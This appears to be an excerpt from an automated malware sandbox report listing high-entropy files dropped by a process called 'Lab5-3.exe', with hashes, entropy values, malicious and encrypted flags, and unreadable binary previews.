                                                                                                          Entropy (8bit):7.990649440634671
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:/3VjZx1SCtYNn7gtlDr7RGs8CcmFayKmmNECDtGAsXk3MWfUtb:/3VjZx1S8YNn6lf+msyJOpGAL3MXZ
                                                                                                          MD5:4B94959BF804D8EE65C531EEAA937BFE
                                                                                                          SHA1:C1B8D27F17995F8643D162887B4B60C2F20CC931
                                                                                                          SHA-256:765AC31D2886F6B47A6F9FDD72026EC9BA5D457B0189F1FC2278EA0BCDEA3F84
                                                                                                          SHA-512:1B146E829938C8DA0AB933019F1D8917689C64D33EF562DC786ED276E61F078E44BBBE2AAD476ED41430ECBB967FA77004047AABB9E270AD82F673C33387F397
                                                                                                          Malicious:true
                                                                                                          Preview:.r....b.....mg..l..t.!P.;..<@,.|u......r.P....@2..D...l..5<7p.E.".C-.o..a0.|..g..N%.....m%........;`.......+=...@.o...H.>..u.KU...KK.M.......Kym...oJ.v.r..-'..Lm.._..;E.{..`.)gk8..q.2....(5.&..h.gN.*1."...lp}..j.I.&.:.)..x..N.........$a..5......)E..7E...;k......^...".p{.2..7.%O5...?.G.l..$...}........E.K..F.......DV.`)..&.c.Y..+..h...1C.#..+g3z]Y......,..(...................B..1B..@.G=.f......mM....O.])z...?a....l....."i.M.....s9o....r.:.A..iI...PY.....S...]G../yv......v...\.Q..I..../7.~....H,n@.ig.."..%4..6..n(......c......F..h....&...K.....}........R..a.L..3.Y.I4.t.."..s..Bz'.QP.6E..H.YE.....G$........W.%`.N....S.0...8...;[.4....)..}...,*.K.z........B9%{:.O.7.].......~E..n.XW.....I....j..Q.44.........5.}A..~I...y.L...b...'I.SF....$....0P.....].v...e.6..r...b3..H.)].S.U.5....M.a.F..!....D...}.%.Q?....3.>.e...0.*.;..;6....D.~n.zC...p.T...;.2......=.@..;.:..........8,,.f..M...p....@.........>;#...e....\..<..;D.V.,.P..a\g....td.4 ...R.w?&.>d.b.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):51632
                                                                                                          Entropy (8bit):7.996391696536913
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:NK5wuxaFypiMzyC11ao1fTCx7G+oLqBrbZ:NK5wuxaF0imJ8UlYrbZ
                                                                                                          MD5:8BBCED2E49117DE4B2B39BE1341B697B
                                                                                                          SHA1:037059D6FFFFF5634B45FBF79824057B171A1918
                                                                                                          SHA-256:1A4B413BE78E596A184012BB3CE2420E067FB77EDC54CAEBAE3BFFEFAF532EE1
                                                                                                          SHA-512:DE2D203FBC158C1B9750A636CA2F9B283E326109FADC8C55D33B0F98C859B98B93CF5C88478E98CFD157F19A2ADA32B0C78477B14C85B7D34A84C3B8C7357CBD
                                                                                                          Malicious:true
                                                                                                          Preview:....]\..+.W.Dq.J........+..M.....1.2:..T......%......D.M,.).......+........GI..;.KJ'.LTi........P..{4f%.K..sK.......w8.z.[8.+..y.bz...gq......T.D.Y.R...F*...V\_2.\.;hK'......5..yH.t..."..|..y.ReL.x.....o....I....r..+.W.m..&.6...+.`4..H..F...{....%o.hX.:...{a.Q...z..u.....C...x....g......gY9...*.:.....IS.2........V.ug..H.U....E6...[.*Cc..T.v.W..m.B.c.H\[.[X...%.....)....T..W........i...*9...!I.(V.w...0|\v..^..b..ynH.......x.P-zU.{.....F.,.(y...?^.....>-.....7.`.`..y..C)..g.}.....Q...(..p^.Mv)1.-.....7l:.x......x.Z.> ...~....jM.,.....W.M.BtY..D>m..Je../~...]..>..`ar.8AA..U...k.K..N........kt...q..^_4..9...Z.....d.......^$...M.G.....m.d..W..y.b...n..;.Rk...#).9.XT.bH.5.[w.~."9..#.h.Oxn....L.J...0gN0..447.....l...I..G...>_.eT'3..d..8....7>......O=......9 .....G.@....4N>..Y..A.YI.g..<H..H... 7..+../...W!...~.$HS/.|.*...z...*~)......-)^.v..#:m.nZ...2......./..OeD3..._...G.....1q.!=...0x.o..b!m.].~%...M..*....E.h)..Ek%9...a....b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20080
                                                                                                          Entropy (8bit):7.990561534157671
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:il1dj7vze6hCV7P1mNoTfHov0/5KTG/yVZn/Y9CaUPUgqAWeuDJDItb:i7dnvDmL1oo7ov0cSM/Y9C7PlqWoDIZ
                                                                                                          MD5:3EEE8B17679EB83078505BAE37CD38A1
                                                                                                          SHA1:5A794BD1D9978F9A6EABDCC826D2C0365AC281EF
                                                                                                          SHA-256:0F5AF80C55220FFE97EF608A34B7F69763EF3439880872CDFF11463D5A45FFC4
                                                                                                          SHA-512:0581506805760704B97611ED40D4F8BF2762E5F670F231475E34986E72B4FB28AE59860846384844BBB90C07C856C031EF714A82A11855FC7FF2409B3AC84018
                                                                                                          Malicious:true
                                                                                                          Preview:..8.. .]..SHJK...;!....s.D.`....$.C.n..$..;.................{..z.A.ivb....f.yt.%.,*......1...&..i........9..(....z.H.=.#..!.A.N.k....;.#r....z..ye........,.>.....g...].T.~.u...9T.fe.b.d.>.z.....g].@.|...5...(.$9.FBUf.....X...P..%Z^E...K...fj......9...4.x5...P..5./).,~#>(..30.0m.S:......2..#.[N..d..l[..z.n...wB....ly9...U....6....X...RA..'X.b..8.WY.Q..0+...$..?...b..>..`..3q.$jq..=.s.E....w..V@.d-Y.X.v...l..........k`..7...X.q2#.^@...K+.vxa....>...S....S...U.......w..`..Be..R....x..[U...g#}.2}8.eN .... t..e....3..u....s..H5....kHp_.9.....;..0v.IA..0?....su0.n.....3.">l?..jVW.T..5.w.._.?97...'..RP2.....v....B"%s@.eO..I.\...-U.j....I.k6V./H.V0r[v...\.d.ly.....{3Vy..Y.........p...$)..=M...D;6Kc|m.$..-x.U.Nz....B....M9e..XG....qc..4UI.`.~...]..."w..@Uw{...m..\h..m...]..X-...W..K..U...7..B.P&l.+o..0.#O.Jt.......n..l?.M...v.....0.0......B.BU...N.X..X......D..] ]6.f..<.#.....iR.|ok..I.~>..rQ...7.3.....$.].q.......U.%4JB.>.4c........3...N.1.n+..b.I.(..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44560
                                                                                                          Entropy (8bit):7.996091109263782
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:NS0pksgovbqSNlzEumklIzTxsyMps08oKn3V/a4tVdrulM41zMgKJu5meNF3ZZ:NbmV6NNptBIzTxXUs0Xk44TwW4VGc5lj
                                                                                                          MD5:1724250A1899F0F50E110FDDF065DE03
                                                                                                          SHA1:D43FF27CF9B1B523056FEF12848AA7E5891D6858
                                                                                                          SHA-256:400EE8DDCB28DBDCB1CA6AB0C365A28E6395F7E129905969C78E12F9C2054D36
                                                                                                          SHA-512:69433610E539830E7300DDE60042F80F15C1964D93088E7C82FEFB7BD675F0EC6E0CA84A5B909C55A407FC2E3E1861EC639BCBA5309C0C187125FDBDF819E391
                                                                                                          Malicious:true
                                                                                                          Preview:..0p1.......~.^....H.#V$..AU......q.t...>..~$.kA7&7.l.Ed.k...m.t}_.i..7.?."._.v.......tG.mT..s...q..o"*......7..a....i..X..q..}.....A....zss..Vk...u...j..b....].h7...#e.j...-..S|.(e....4...N.......L....&..#Y......=>Q5.....\.B[..x..A&.B......W.C^...2.H.d.@...a.[f..$b.;|.Q.[z:c.....V....B.AM..!.."m..c.O.bd.......kr..B.t..X..*S......\2.Tfj.2C..A..l.]d..._EZL....F..B.$.......... ...<o.^.....Cs.;H.,.......0#]...t<......1e.f..)...._..J.Q...C...Q...PZ..~X.='.ZN..2.<.<..m."s%...tE.$...g.7.G.....g%w.g.0_.dM..x.v..lj..S{S|..3S+........v.....f".7...gv.....O........H.Sh<......u....5.F...._5.....~D]M.........`.B...Y.gV..)...2......#a...a.}6H.Y....T.x3..]>...5.k%O_:ii`.....O...x.....L.c8X...YS.m.KK..b.FE....M.i.......;{j.t..4.U.T..t.....!....."..c4U.V.'.;.z.............N.......<..rS`M.-.....^..Q4..+.."....}.. ...@.j.2H.....s...].X.W.3q;V.-*...;w9f.7.....l.I l.Ut.P......G'~..3L..}..........053.b.:y.L\..d..4`.....E.K.1#h.........t&................% .hZ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16896
                                                                                                          Entropy (8bit):7.989045308775979
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:M5swRRyuUFZo4hsKoeTS2kMbsts6bm1Wztb:M5sw6uesW22kWusswKZ
                                                                                                          MD5:5BAC04168C334F8CF4A0F843870460CC
                                                                                                          SHA1:8BF04BB5781C5B56651E23DC1983B8CEA9294B31
                                                                                                          SHA-256:2D4BE08DD336D7A641676BB93795E7F20F816A7D9C390172878AE9F7BE77CF9E
                                                                                                          SHA-512:7ADD2FA8FB70EC5D5A37D7276C3844F2D50BD9B8AD48EE1F3873C844F8F5129B0AA6FABCEF402FF0DA97E4EFE7C3A24EC16658BC7D07D3F1A225997EA61444D7
                                                                                                          Malicious:false
                                                                                                          Preview:.b#.<..2......u..{..p..:......8..5...t.#..N8 .?......*..dF...y...q..@.3.$d.L..../....?fW.YQ@.u.#.(....$o.c`..L...=M.Y....C"<.y.d,z..7.5...>....kt+*.#.^:s...}....-...Qh9{.oA...w.....+n;$g.ZQ.....(...N..r}./....qk.z..PH*.....).....y>..S.04..Z8i..k.X..'M...6.^..mM#......~,6..3*>..f.+.@.,....P...Q...b||.'....g..S..=.."^..".Z..>...w.........%.t..S..#..V..v......U..e....V.......<.d..'x...9.......C...A.6..rZ^.Z.......c...)...%@...Xj.t.d.b..B..(....s...>O..<O.r.......*.a.]....\O..3.N.j@.r.~.{..?..|.......J.O(./.:.It.I..%!%..a.....M".A.....>.qf^e...I............yO..<y&.P..N..@.......d....^.\..........*..rK_j.k.e.]w...8..\..."t2...{'_P.").`:...y6F...;.....h:..&MF.I..VLkD;..v.Ppl.<........~..r.%}..5G.1JGxk.E.....ud..|vV'..F.B...C.Si.....i../..i..?.uwC.+..`.B..-=aw..o...pY.l....h.q..V&.D?g.MZ...T...5.%T....-.@.A.0..u.O$.8..r..to.f.L.I.{..8T..m...tU.r....D.-..I..SQ.+S@....&..7K.."..(V;Jqi~..c...l,....++...~..X...S.......^G...F...P.bx.._../.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17008
                                                                                                          Entropy (8bit):7.989983972969669
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hZwPonwidnzF9SFEHcWX7HtHbLKdfSJW1BqqEFatb:hZwP6wInzLSFMcw1LahCaZ
                                                                                                          MD5:A1D249AAFB650CAAEE8C011BD96AA16D
                                                                                                          SHA1:11BFB1489BDBAE137CCC5166DA33A10141AE450A
                                                                                                          SHA-256:4D1C0ABF63C45483C0F5776BC394BB2C8BCE55CA969C6D3D625893EB53C2C1F9
                                                                                                          SHA-512:C9E932741DE9FD9022A372DD70664408C4D25FE6368C0A50C31BC4E2AC59251BA1666065C315BAF74741FAC4057A51CDED605BEE8B20AFEEC637D5E869D18F16
                                                                                                          Malicious:false
                                                                                                          Preview:....cz....../.=ie..j..O.|!..[.......5R=.6*..VN..}.).W..g.....:.~.g.....T.W..V.."..wk..d!'B.G..>>qk..........75..?..@..;..3r..`.5..vV7.FT...ck4.z...R..L._)X...5f..@....c....\.'....j-).......$L...0.T.V...L-Co.Nb.Y...B.{.Z..6...e. ..(..kJ.r.z..l.H.?t..t.G.Oq..!.....-K7J.C...h!.r.;...A..A.j.w..o.'r@~m|.&..p./9.;e..S..fz.......|7....N....P....y.N_.Z53*.g..../.8.t...9.u....7)..C'......3..yC...8X.k}.....k....`.e....s.Lp.!.N....U.|.A..7pv...o.R.y...!q(.......b..]H.W]g\`...1......u..b."Y&.~....9..Ph^._..'..........@.y....e..8..?...0.C]"i)..?.....R%/YQ.I...L...3..e[f...~.P.[...Vn......a..|5.NO....V..+......86I..8MV.\m..@.....w.B.:../.k.........9.......Cd.F..g....mmY...%..pL.p.h=Vg.^..0.!.){.{..(.%..P!'......Ga.....q/.....2..?...P.....v...p......o...3..B.....{I>.U.u%..7....N...........oG..<ia: ..D".0..V.R'.o...U|......mP]...pk'.?..D.....N,ou....@Q"L..n}...K..O..o.....y...n+:.LQz..1k(.n-......l.C.....88...:.OA2..)Q. .,o.D.;"j.p..U....y......3.q..eV
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):224192
                                                                                                          Entropy (8bit):7.999145818168366
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:GLXxcK6bVUrfBU/PD/vbPYXspSv9xS9DxR18VkQbZZ:G1BBBU3D/re1xSDxR6k2
                                                                                                          MD5:384D5A0EEE9388628BC4A21D64905903
                                                                                                          SHA1:34EA9C56600B975CACCCFEB25645ABA6410F1683
                                                                                                          SHA-256:341131E321CD58612E813CF29625A5E9179B605DFB4E383BDCDDA6D530FF7A60
                                                                                                          SHA-512:515C6F6872C5B8CE9B0D84A5A9DF528D8F570B8FF1719354CC8E0FD17F603511FB3C3907FF8FF3A9267590EDA0939806700BFCA7DF5DFD1E549B206EBCDB6B8E
                                                                                                          Malicious:true
                                                                                                          Preview:a......1.p.3=..LX.....S.ma.^^.b.....g*.j.).>.....n..y(..Z..=hbO.*.|x..!..5...(.3b....R.....!..5..PbN`G]...g..)...o(.%e.......B-...Pv..].F....[.....es$.z.*..|...ko.*...C..8c..2Y'.....GZf..yM...K$.$.+.....k.J78"V;si..R?..'x.Ro....(O&...rz..[*.aTr.r....h.Q.. .8wm.<.&.y..l... ....).R...Ldw..8Zb..l..R.:.._......u63'.-w......q.#...^.B.W....e]nK......]...jJ.P.:..U...<{X.1.......$.v.ZW.f(.*.....HC..<..dF.....-.gO..........Xi.7...._.9........b..].I,2..).....x..B.N..G......l..]..y..._,c..X.....`.....c.T.....Y*q............T.U..,..u.|.X.0C..#......0..EH2j....-.-9k.k..%...c.-....... .d"j.v4.X?.u|7h60.D.*..O....4.\.b.B%....~.K.w.;..5By.....?.....gQ.b("Mj.x....=...0.HLS..3'....<..i.........0..|c.y.`..[.L.;....p1..H..J .JF.)..{.../..xg.F.PFz."Ea..i.0..9A4.pp.;R{_A.......h.M4..1..]D..u.%j..;.h.E..7.....]..fy6.F.Sf.`0...r4....>.....QHP.....)v8.*..a.....A..^.....<.2.k.V.4.f...A....|.o..-&...x.:"......yF...Y.S.'*Fj.....U.).~.8.....H_..fX.... ;..["b..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22336
                                                                                                          Entropy (8bit):7.990834962991228
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:oG50KJwdNHS9HFomjaeuSnKKsMa7SVrpLQjZ0ryj7m0TP/89V3Wnpcjltb:oGTKXS7jY8AktpLmOyfmsP+FWpchZ
                                                                                                          MD5:934318D873DFD3AD75206C9AA2B22DA5
                                                                                                          SHA1:C16302D427F18C00085F34491422767DB93BE653
                                                                                                          SHA-256:6E13CD01E0704E688D3BB4CE13AF4B76A720D93208A01787D62CD4415C9D3F8C
                                                                                                          SHA-512:4E73263F8ADCCFC604F5A5C26BD83A8CB034ACBD2BB8B980C79038F31D99AC687D1E701C0F9BD13B3DE09460546FE9D3BE3FDE4D3EBA8F76941DA4B8A41ED6B2
                                                                                                          Malicious:true
                                                                                                          Preview:v.:;..0..z..j.Wb....=....H{J..Y......O...".U......H...o. ..L..>..&...5..-o.."...>[. T..fZ..e.]...u.c..i....n.........i.........g..j..X.6M....8}.Ge..Ii..L+...|...da.M.A........*.H6.m#E.....U.W&.fTFe.i..n..G....E.._.1A.C..a_.(..&6>.4.#._\..X..&..>.L.`....)...8rR.x2.N..........f....~vs.......l..#.L..|/>..^../...Q..g.......%eV....8n]wH7r.w..........k.K.......M......;R..b(4......S..P.....y.+..Iv@8S....w.z...1.?l.`...E...lu._..5.YhF:/.5t..6..z'0.qn...E....../....J.hT..&i... ..F....H48M......:[. ~...^....M(X3.C..sq..j]mm..G..[gtZ.].".2.."..1/.. ...~..i=5x..E+...I/.dz,.7.......60..|k.U...'I...{:O.h....W.OA.y5.^....Rx.k....x.v............m..5.1y..I.....h.w.@....J-.&.e..78.^...f....t...q.Q...~.....o.voOc)*#..S>.UL.....)g......H...F......N...j..o.Y$-?.:.....Y..93..-.Q..?....!.'G...`..`....M..I.....!....4..!.U+....O\4R.%.jOr-..!.>....y.2..C.....R@e#c. ..[f.....)....a.[0...s.....|....B...7.l.*....,.q..f..</.(...$..Al...g.}..r..%.p.....n..G..g78l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18832
                                                                                                          Entropy (8bit):7.990931188555981
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:Jhn0nUHEqO0EyZd6I/n2Mg9x6YnISw3YEoNk0qBk3UBgf0I2g0CywKztb:Jh0nUFESfv7MoPP0qBYUBk2gqwKzZ
                                                                                                          MD5:ABC98FA5B1F36D7011D05E6F1E620204
                                                                                                          SHA1:D832ADE34E50CA030F59E4A3D53A572FD41463D4
                                                                                                          SHA-256:C9406BE2113091ED2A6152CE35C06B655FD76D861B901BE8EF920AB4DA3CAB77
                                                                                                          SHA-512:908FFDBE35A7393BB3CFD5B4F4F7B5D315A67CF19F02FFE059275F91997CCD5579B6AAE582B3AB22D83EC094D4EE81EC28327777CD504D5698C2FF7CD2CA7D24
                                                                                                          Malicious:true
                                                                                                          Preview:.H....@.0..w,....;jI":=F.y...v.[..F.d..........Pv*....-3Z..........p...[...PKs..^.o..p.T?....s.<A..h~.)C.L..{.....>.....z..!T1V...d..b-{...4u..d......m....4.i...A.td...h....O.k......{...^^&(}.5...+.O:..5...u..G..8G.....Y..I..5.s....2Q..-.|.#wi.......0..)d_..:...Z...N..Z.B ID.o..'...,.d.;Y.a.....l.A.^.V.k./.(...W..'....p.m@..?..!..*.u.j.<...Z.r...>..j..-tS.6.^...{...?,f5..]."..%{...I..G..~*"'E...\"3..S...Au4.."".4..{*n+.X}..]...CI.......g%8.e......n.w.i..`..p[..-Lx...h...C....c..../0..........z..1...x#.!....E..u..........(lP..Jf....DuF.8.n..u......<..o..2G.iI. ....P..C.9./. r.9FY.k.....Po..,z4..?B/.<......].K...E3...t..7..Tv0.u[7...}......o'.f.....).sD...{`c..[...>.E......q>........U.Jc.P\^..Q~lnh.V..=E.O....\Xz..J.bUB...H^O..|;A&....._..d...[.o......R.#4.v.Q.+..0G........6D1.....d.y.q4...jTa...........K.tt..Niv.......1...v..G.....c...".R.Q...Ub.C.M.D....*.5...).SsI?.x..F.y..2$..C..vC..6..we...s.8.....B........H....../..T...e_.@
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7280
                                                                                                          Entropy (8bit):7.971451839898543
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Hx1xuMp4nyYa2QDdM72nVsdBbtn7tX/R6t0Cb:R1V4nFarDaanMB7dGtb
                                                                                                          MD5:14426E6A3DD88927DED63975F2F58CBC
                                                                                                          SHA1:5BA55E320D34E654A518F453E95B7277D5BE0A08
                                                                                                          SHA-256:EF071001DEBD6CDD4EEEC40E88C09A5A83C22EC553B3588F6D7E5E14BF77D0CD
                                                                                                          SHA-512:4CCE866A332858FBF25A149AAFA6FEC9C84BE9DE2D884B3EE4B61358F7447D845023DB2EE8D1DC3649511E6357E0084AB5F3B526D573C45B144A6EE0E85A3AC1
                                                                                                          Malicious:false
                                                                                                          Preview:.&.._..S.D.=Zx...........|+...L.9;Q.q...B...d_...b.3|.5O.37...H....8...#c..%...._.s....z["J:s..@&?Y*.1..\.....yG.l...g..Z*......3..H..+e....)...1.p.Y.....(N....=Q..g.....8~K..-[..?..m....j.&..y>.Lq..u.....>B.t.g9Z.T...%3$i.s..~..(W)I.....a-.7...B..OS"......SW..7.......].Z.I..e..z..ld...Z...T."..[...^.b.(w].....@.#..#.%.RFz..7~Q.$.*f..?8.L.<.e.S..a.........A3^...:'o-Q..0R..VD.0j.,.'..y.]4......#P.,.t..-f:h...<-.6h...v..Z.Y.{<......>P.......3a..-L.._|..#..s../.u..b.^.....by...C.R.#..r..h.2....e....`...|(.,]K...._cRD..!..............Q..zy..I&Z.\....G..P..Iru}...j....>C....[...i.?....<_.d..3VW..h..r.....kz"c..0..;.q..8..x..(Ge:....r.n..F8zv..;;.........:....#.$&3p.......#...J...fI......-g...;1......h.f..w=..5..ul.q.'..@.......:..e.O..5..eR.UlF.~'<.B[)2.Z...X.<cCL\.....1).y38i..>S..5}.C...!v2$a0.G#...n..Py..q...O..@.Q.V.m......+Q....eh.?`.Z.L.6..t....y.....}l...~J.c.z....e..G."`.(.+.TX.p..j..t..FH.-.V.;..J...f..Zi^6..<......)..ar.}%......v..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7968
                                                                                                          Entropy (8bit):7.981161394566862
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1hMPu6nkTJj5yRL0oQst7KeF1cqiRygo0Cb:1hMPjkrML0YDF1cPxotb
                                                                                                          MD5:A3A816069A094AF1B56A26B1470CED8B
                                                                                                          SHA1:9BE6B08C93A3EDF403D59147851ABB1B315D2557
                                                                                                          SHA-256:E5B41762709B0085D625002794B62D9579D12805B1BDDF7875777D38938B508A
                                                                                                          SHA-512:18F9CD337987BA982570A92E8640E19C319782F105FDC8E1B70D2BB96DF56975F5E92CF8ED9446A283690070CBF1CE0F5CED8A1A8FCD621641F6144642949DD8
                                                                                                          Malicious:false
                                                                                                          Preview:).h.y...x.b+...Q.D.....P4.[...J..2..b...nQ .'..U..|..........eW..,..X.H~`.....'..c.Y.iH..!5.:k.v.qnzcM...t/pk...4.QHG-...k.T)^*c.....`...M*....u.....o(.........G.B$j..z@..........K.....!.....].z.I..w..@R.3.LS..........<a.. .2CcG...,..+1...|...]P.;:YCxV-..(.K_.'U.5K.&I...:..*..o.X..L....g..wT.I.....4_..........&~..3.8m.`..:mI.Sq..cV..cs...Ni.y.Q..z..y....S...T...6.Qx...!.G.D.|..LhO<.Nfco._y..DC..8b...R..T,v..... B..?..]....U........l.<..W,...g.(.`_s.?./5..J..:..y..=...h..c..KS#..y....i\...>....c...x;.u..d..[+qLUHz.4..g.$k.ECuH../.......*.^8.%.......(...)...N...\..&..{c..FD..&{.a...?.~+.:...3.......Q.P.......^...B.A..GD;...E..A>...~.2..v?.5M...8:g..r.'..p..p._n..........{.pq...e.Hj#..=..F.7..hi._..i....7.A.O.r..F.m..J.....Cdc.B.2.,.5...d.Hf..m..4...m.....,.....X...,.(Of^v*.t 0..8..ED.t....%>b....&....?.Stgw[..[...0a.Xe</.)..,...<2.|.^.R..#qj89.I....N|F....8g.....xp.....t\..R.#....6.#...a.J..jj.~...,..8.r...l...n.t..L7....Zp~...-..W...........X..)7....r$.h:0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):59024
                                                                                                          Entropy (8bit):7.996759546528514
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:VlcsMgOmDKZKgO/Mla71T6pBdz/p1zwQ8n/tD6jXZ:Vl9nDKZuIaBIHTpiQ8n/tD6DZ
                                                                                                          MD5:51445DE2B9DC6510E9A4BA0285B73C75
                                                                                                          SHA1:DEE7B2FC9481A61FC537A46D54E23FA4CD14DFD7
                                                                                                          SHA-256:9D2D508FDCA8BA50E7990A6A90C67EC91673DB97ACA23D4F50728AE7BC56CDBD
                                                                                                          SHA-512:E13F5A5CF92588D42F97054C10CB83CDFF0F73BC305F45853ADA77E2BF7A58A5A8DD9FA23076E0334A600D54CB9A4A29A01C7FB40B9242A701FFAAFFF7D66B66
                                                                                                          Malicious:true
                                                                                                          Preview:w.P..<uv.w...^y....b2a.....Q<.[.....\e.4....d..%.".R<[...1.h.....@....p.......N%..q..^5.Y..C&....7.....=.-.8)Q..sz..><..l...*t+..t.N.?.%1........I.3.|6..W..c....h'..O.V....&.....2..c......S.Q.y..9......#.....u...2..kyG...d.!..D]....M...29[.c..D.o..\..V.v....w/+.....#.+.[...|Y.....R.S.....)3..k.b...$..)...o..Q..T.4hf.......u.{m.h...D..\.....V....es.$%...A...pk..l..$.U...).X.l.D...+..}....K.....0!6%~,n...|.V..C.E.....aK.]4QXTaF?J\.C.7+..p.w.......L.o.."v..^..u..n..H....E...J.P.9..Z..RM.d.._o..qw..........I.Q@.i...m.b...hT.5A..}.5].F.$!.....7.......c...2.)6P.m......bV/.pqu.d?.GW........|_.|..U.\aisZ$.'....l1..V...X0.E..6......'.RU.eI,.=..Y..........A.......13..Q..i.%i..@.ri.u.....D.=.I.i...s.....g)[...{$:JP.s.P..........7.u.{~...0.X...4.%~.Qp.q..E..'..[.Qz....W[..RK..k.3`n..xgp.`..........CT2g.U$.}.....@.....Q..e.C.....=a..`....(('..FA.9/...KU..he......$..G.$..'. ...0......{......,..~.-..G......&.P]Y..x....d5v...+.9.OHK..=u...;7.-.l.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27744
                                                                                                          Entropy (8bit):7.992950752363424
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:u5ORkbbw5Vq9ctXyyG4frfIIRW0lUS7+FF+K3Z:cO+g5VicpFGYrR3OZ
                                                                                                          MD5:56AFE1EDD82AF508FF3C7E61E22DB49C
                                                                                                          SHA1:382C592CA6AB56C65692DA5F8B96D7FC35129908
                                                                                                          SHA-256:59542DA48EC80D4A08056A27D487348F97F7AC1AAEA01DB1435F60CA21E461BA
                                                                                                          SHA-512:62609418313064FAA9C5F303F8A13DE3B659C166D774E56713CEB355F6CDA76D62684B0145141F115E048E3BE862678B762B39852DE89756F7FE4EDF9C2F2354
                                                                                                          Malicious:true
                                                                                                          Preview:.....yw.D./.*.A.R.[.J.G...t`...)m.....Td......U.{*"T}.`3i-..R......W..`..A...tb..?OD.,.j.d.....z..nY...zn.*u~.zi.{44`P..`..7..[./..6.K.q&..+T..V.51~...I....c.1)...Sj.f.l=....Ivd*....<f"..t..C..XH.......I...L.=b.0^r...AA..2..w_..EuR...u#.`..BO.,.:.a.........K..r.7......l.0.GK..IZ..o.;.8..:.!..%x.....W..Wk.W9.....>mj[!]...,..2..:U@.{qj..z.....'..2.#.S...326.k.......9Dg.D....U.A.6.Ri...m.<C.Q$4 ......g7...7...7..~7'u{x+.$...rT...I...>Z.O.u..b&....UFv..o..5.._....1C.......dA.Y.B.s....Uh...`.B._.p..SY.sg|V!#\.M...m..tZ.......q.M....l.*....@...3.?..).3=....pl6.g...6..d}./..g029.c.9r.Z^be.....!)un.".}...~ip"..V~.... ..e.v.n....rG~.|c.O.....E......[....[......|.t.L................."....H.......L....[../{..P......x.......<..<...2.zq.4}...m.E.&.=W.;N.....S.(.....&......u....j.<=H.'. ...~0..6.mC.H.s.....(.I.b...l.E..)...;...9&....)<n..a.....H.l.x..I|n.qo..E....=-.c..!$.....F...co1.h..}l<..(..v..P....}..{.3e.,$..2.4u..O..Q...*.F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.928547688535561
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1M5uN7d4pVavS9/qW/0IzHfUTid3hBaUoSGFcmeykEdEElU92i:1CuNB4pVaci20XGx0uKeY2ElUJ
                                                                                                          MD5:0F2E1E903F5EB7FA6E7F7A70722B64A9
                                                                                                          SHA1:C80D245DBC4BE52BFCE0D71EFE03FCB9A0F19899
                                                                                                          SHA-256:43C3C82B5DA53A91FC3EDB58F52CEB407B7A0885AF9C3C0A5A3AA070BBA5E6E8
                                                                                                          SHA-512:C02B8F01F685AF636E63E93BCB87A569E6149888E3165BD4A475A562DA6118FE81C24A7C48C3ED23E0DC369A7F634139BBD2AF297B7C19C4B09A0BCB83F0650C
                                                                                                          Malicious:false
